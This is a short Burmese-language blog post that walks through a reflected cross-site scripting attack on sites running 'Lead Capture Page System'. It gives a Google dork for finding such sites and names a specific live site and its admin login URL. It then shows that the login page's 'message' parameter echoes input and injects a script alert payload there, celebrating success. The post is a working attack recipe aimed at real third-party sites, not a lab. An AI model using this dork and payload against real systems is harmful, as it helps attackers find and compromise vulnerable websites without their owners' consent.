XSS အေႀကာင္းလဲ မေရးရတာႀကာျပီ... ဒီေတာ့ အပ်င္းေျပေလးေပါ့ဗ်ာ.... ကဲ Dork ေလး run ႀကည့္
intext:"Powered By Lead Capture Page System"
ႀကိဳက္တဲ့ဆိုက္တစ္ခု ၀င္လိုက္ဗ်ာ... ကြ်န္ေတာ္က http://teameliteresponder.com ကို၀င္လိုက္ျပီ
အဲဆိုက္ကို http://teameliteresponder.com/admin/login.php အဲကိုသြားလိုက္
Login ၀င္စရာ Email နဲ့ password ထည့္ရမယ့္ေနရာ ေတြ ့လိမ့္မယ္... ဘာထည့္ရမလဲ စဥ္းစားမေနနဲ့
msys လို့ထည့္လိုက္ (ထည့္ခ်င္တာထည့္) ႏွစ္ခုလံုး ႀကိဳက္တာထည့္ဗ်ာ....
Login Error ဆိုတဲ့ message ေလးရလိမ့္မယ္... ေႀကာင္မေနနဲ့ URL ကိုႀကည့္လိုက္ဦး
http://teameliteresponder.com/admin/login.php?message=The%20login%20info%20you%20provided%20is%20not%20correct.%20%20Please%20try%20again.
/login.php?message= ေနာက္က ဟာအကုန္ဖ်က္လိုက္ဒီဟာေလးထည့္စမ္းႀကည့္
<script> alert("msys");</script>
Bingo!!! We got it!
No comments:
Post a Comment